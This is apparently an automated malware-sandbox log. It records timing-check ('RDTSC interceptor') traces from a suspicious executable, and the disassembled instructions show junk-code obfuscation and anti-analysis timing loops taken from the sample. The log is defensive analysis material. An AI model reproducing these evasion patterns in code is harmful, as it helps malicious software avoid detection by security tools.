Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50DDC second address: 4D50E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F80039AE136h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F7F9153F87Ch 0x00000016 sub eax, 4F5D1938h 0x0000001c jmp 00007F7F9153F87Bh 0x00000021 popfd 0x00000022 mov bx, si 0x00000025 popad 0x00000026 mov eax, dword ptr [ebp-04h] 0x00000029 pushad 0x0000002a mov dx, ax 0x0000002d push eax 0x0000002e push edx 0x0000002f mov dl, ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50E2E second address: 4D50E8F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F91348E2Fh 0x00000008 adc ax, 43AEh 0x0000000d jmp 00007F7F91348E39h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+08h], eax 0x00000019 jmp 00007F7F91348E2Eh 0x0000001e lea eax, dword ptr [ebx+70h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7F91348E37h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50E8F second address: 4D50EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50EA7 second address: 4D50EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50EAB second address: 4D50EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50EBB second address: 4D50EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50EC1 second address: 4D50EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50EC5 second address: 4D50F65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F7F91348E30h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7F91348E31h 0x00000019 and eax, 739596B6h 0x0000001f jmp 00007F7F91348E31h 0x00000024 popfd 0x00000025 mov ebx, esi 0x00000027 popad 0x00000028 nop 0x00000029 jmp 00007F7F91348E2Ah 0x0000002e lea eax, dword ptr [ebp-18h] 0x00000031 jmp 00007F7F91348E30h 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx edi, cx 0x0000003d pushfd 0x0000003e jmp 00007F7F91348E36h 0x00000043 adc ax, 1368h 0x00000048 jmp 00007F7F91348E2Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50F65 second address: 4D50F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50F7D second address: 4D50FBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7F91348E39h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, ebx 0x00000017 call 00007F7F91348E2Fh 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50FEE second address: 4D5102D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F7F9153F87Bh 0x00000010 test edi, edi 0x00000012 jmp 00007F7F9153F886h 0x00000017 js 00007F80039ADF09h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ax, di 0x00000023 mov di, 95BCh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5102D second address: 4D51074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F7F91348E30h 0x00000011 mov ecx, esi 0x00000013 jmp 00007F7F91348E30h 0x00000018 mov dword ptr [esi+0Ch], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov eax, edi 0x00000020 movsx edx, cx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51074 second address: 4D510C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 772406ECh 0x0000000e jmp 00007F7F9153F886h 0x00000013 sub eax, eax 0x00000015 pushad 0x00000016 mov esi, edx 0x00000018 popad 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d pushad 0x0000001e mov esi, edi 0x00000020 call 00007F7F9153F887h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D510C4 second address: 4D51101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F7F91348E35h 0x0000000c test eax, eax 0x0000000e jmp 00007F7F91348E2Eh 0x00000013 jne 00007F80037B7412h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov dx, 76D0h 0x00000020 movsx edi, si 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51101 second address: 4D51113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F87Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51113 second address: 4D51117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51117 second address: 4D511AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7F9153F87Dh 0x00000012 or cx, 3606h 0x00000017 jmp 00007F7F9153F881h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F7F9153F880h 0x00000023 adc esi, 726024A8h 0x00000029 jmp 00007F7F9153F87Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [esi] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F7F9153F884h 0x00000039 and cx, 1708h 0x0000003e jmp 00007F7F9153F87Bh 0x00000043 popfd 0x00000044 mov ah, C9h 0x00000046 popad 0x00000047 mov dword ptr [edx], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F7F9153F87Dh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D511AB second address: 4D511B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D511B1 second address: 4D511B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D511B6 second address: 4D51206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7F91348E38h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+04h] 0x00000010 pushad 0x00000011 call 00007F7F91348E37h 0x00000016 mov ah, 44h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7F91348E30h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51206 second address: 4D51251 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F9153F882h 0x00000008 xor ax, C088h 0x0000000d jmp 00007F7F9153F87Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [edx+04h], eax 0x00000019 jmp 00007F7F9153F886h 0x0000001e mov eax, dword ptr [esi+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51251 second address: 4D5126E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5126E second address: 4D512F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7F9153F887h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F7F9153F889h 0x0000000f xor si, 8916h 0x00000014 jmp 00007F7F9153F881h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [edx+08h], eax 0x00000020 jmp 00007F7F9153F87Eh 0x00000025 mov eax, dword ptr [esi+0Ch] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F7F9153F87Ch 0x00000031 xor eax, 01348C68h 0x00000037 jmp 00007F7F9153F87Bh 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D512F3 second address: 4D513A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F7F91348E32h 0x0000000f and ecx, 7CBB09F8h 0x00000015 jmp 00007F7F91348E2Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [edx+0Ch], eax 0x0000001f pushad 0x00000020 mov di, 7FE6h 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+10h] 0x00000028 jmp 00007F7F91348E2Dh 0x0000002d mov dword ptr [edx+10h], eax 0x00000030 pushad 0x00000031 movzx ecx, di 0x00000034 pushfd 0x00000035 jmp 00007F7F91348E39h 0x0000003a adc ah, FFFFFFF6h 0x0000003d jmp 00007F7F91348E31h 0x00000042 popfd 0x00000043 popad 0x00000044 mov eax, dword ptr [esi+14h] 0x00000047 jmp 00007F7F91348E2Eh 0x0000004c mov dword ptr [edx+14h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F7F91348E2Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D513A7 second address: 4D513AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D513AB second address: 4D513B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D513B1 second address: 4D51409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7F9153F87Ch 0x00000009 or esi, 12A69378h 0x0000000f jmp 00007F7F9153F87Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F7F9153F888h 0x0000001b adc ecx, 75312DD8h 0x00000021 jmp 00007F7F9153F87Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov eax, dword ptr [esi+18h] 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov ebx, eax 0x00000032 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51409 second address: 4D5142D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, si 0x00000009 popad 0x0000000a mov dword ptr [edx+18h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F91348E35h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5142D second address: 4D51434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51434 second address: 4D5147B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+1Ch] 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e pushfd 0x0000000f jmp 00007F7F91348E2Eh 0x00000014 sub al, FFFFFFC8h 0x00000017 jmp 00007F7F91348E2Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [edx+1Ch], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7F91348E35h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5147B second address: 4D514D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+20h] 0x0000000e pushad 0x0000000f push esi 0x00000010 call 00007F7F9153F887h 0x00000015 pop ecx 0x00000016 pop edi 0x00000017 pushfd 0x00000018 jmp 00007F7F9153F886h 0x0000001d xor al, FFFFFFE8h 0x00000020 jmp 00007F7F9153F87Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [edx+20h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ecx, 0EBEA8ADh 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D514D7 second address: 4D514DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D514DD second address: 4D514E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D514E1 second address: 4D514FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov si, dx 0x00000012 popad 0x00000013 mov dword ptr [edx+24h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D514FD second address: 4D51503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51503 second address: 4D5153F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7F91348E38h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5153F second address: 4D51543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51543 second address: 4D51549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51549 second address: 4D5159C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 53B24313h 0x00000008 mov ax, FD6Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+28h], eax 0x00000012 pushad 0x00000013 mov ax, 2B67h 0x00000017 jmp 00007F7F9153F87Ch 0x0000001c popad 0x0000001d mov ecx, dword ptr [esi+2Ch] 0x00000020 jmp 00007F7F9153F880h 0x00000025 mov dword ptr [edx+2Ch], ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7F9153F887h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5159C second address: 4D515B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F91348E34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D515B4 second address: 4D51618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7F9153F87Dh 0x00000013 or ah, 00000046h 0x00000016 jmp 00007F7F9153F881h 0x0000001b popfd 0x0000001c popad 0x0000001d mov word ptr [edx+30h], ax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 pop ebx 0x00000026 pushfd 0x00000027 jmp 00007F7F9153F882h 0x0000002c jmp 00007F7F9153F885h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51618 second address: 4D5161E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5161E second address: 4D516FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f jmp 00007F7F9153F886h 0x00000014 mov word ptr [edx+32h], ax 0x00000018 jmp 00007F7F9153F880h 0x0000001d mov eax, dword ptr [esi+34h] 0x00000020 pushad 0x00000021 mov bx, ax 0x00000024 push esi 0x00000025 mov ebx, 791D394Ch 0x0000002a pop edi 0x0000002b popad 0x0000002c mov dword ptr [edx+34h], eax 0x0000002f jmp 00007F7F9153F880h 0x00000034 test ecx, 00000700h 0x0000003a jmp 00007F7F9153F880h 0x0000003f jne 00007F80039AD8F0h 0x00000045 jmp 00007F7F9153F880h 0x0000004a or dword ptr [edx+38h], FFFFFFFFh 0x0000004e jmp 00007F7F9153F880h 0x00000053 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000057 pushad 0x00000058 pushfd 0x00000059 jmp 00007F7F9153F87Eh 0x0000005e or esi, 7F6B5A28h 0x00000064 jmp 00007F7F9153F87Bh 0x00000069 popfd 0x0000006a mov di, si 0x0000006d popad 0x0000006e or dword ptr [edx+40h], FFFFFFFFh 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D516FB second address: 4D516FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D516FF second address: 4D51705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51705 second address: 4D51742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov esi, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F7F91348E33h 0x00000011 pop ebx 0x00000012 jmp 00007F7F91348E36h 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51742 second address: 4D51746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51746 second address: 4D5174A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5174A second address: 4D51750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D51750 second address: 4DA001B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 call 00007F7F91348E2Eh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f retn 0004h 0x00000012 nop 0x00000013 push FFFFFFFEh 0x00000015 pop edi 0x00000016 mov dword ptr [ebp-04h], edi 0x00000019 mov eax, 00005A4Dh 0x0000001e cmp word ptr [00400000h], ax 0x00000025 jne 00007F7F91348E5Ah 0x00000027 mov eax, dword ptr [0040003Ch] 0x0000002c cmp dword ptr [eax+00400000h], 00004550h 0x00000036 jne 00007F7F91348E49h 0x00000038 mov ecx, 0000010Bh 0x0000003d cmp word ptr [eax+00400018h], cx 0x00000044 jne 00007F7F91348E3Bh 0x00000046 cmp dword ptr [eax+00400074h], 0Eh 0x0000004d jbe 00007F7F91348E32h 0x0000004f xor ecx, ecx 0x00000051 cmp dword ptr [eax+004000E8h], esi 0x00000057 setne cl 0x0000005a mov dword ptr [ebp-1Ch], ecx 0x0000005d jmp 00007F7F91348E25h 0x0000005f xor ebx, ebx 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 call 00007F7F9134AF15h 0x00000068 mov edi, edi 0x0000006a push ebp 0x0000006b mov ebp, esp 0x0000006d xor eax, eax 0x0000006f cmp dword ptr [ebp+08h], eax 0x00000072 push 00000000h 0x00000074 sete al 0x00000077 push 00001000h 0x0000007c push eax 0x0000007d call 00007F7F95CE5911h 0x00000082 mov edi, edi 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F7F91348E37h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA001B second address: 4DA0048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F9153F87Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA0048 second address: 4DA004E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA004E second address: 4DA0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA0052 second address: 4DA0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA0056 second address: 4DA009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c mov edi, esi 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7F9153F87Fh 0x00000017 sub ch, FFFFFFBEh 0x0000001a jmp 00007F7F9153F889h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA009D second address: 4DA00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA00A1 second address: 4DA00B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA00B4 second address: 4DA00DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA00DA second address: 4DA00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30D7F second address: 4D30DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7F91348E36h 0x0000000f push eax 0x00000010 jmp 00007F7F91348E2Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F91348E30h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30DC6 second address: 4D30DD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
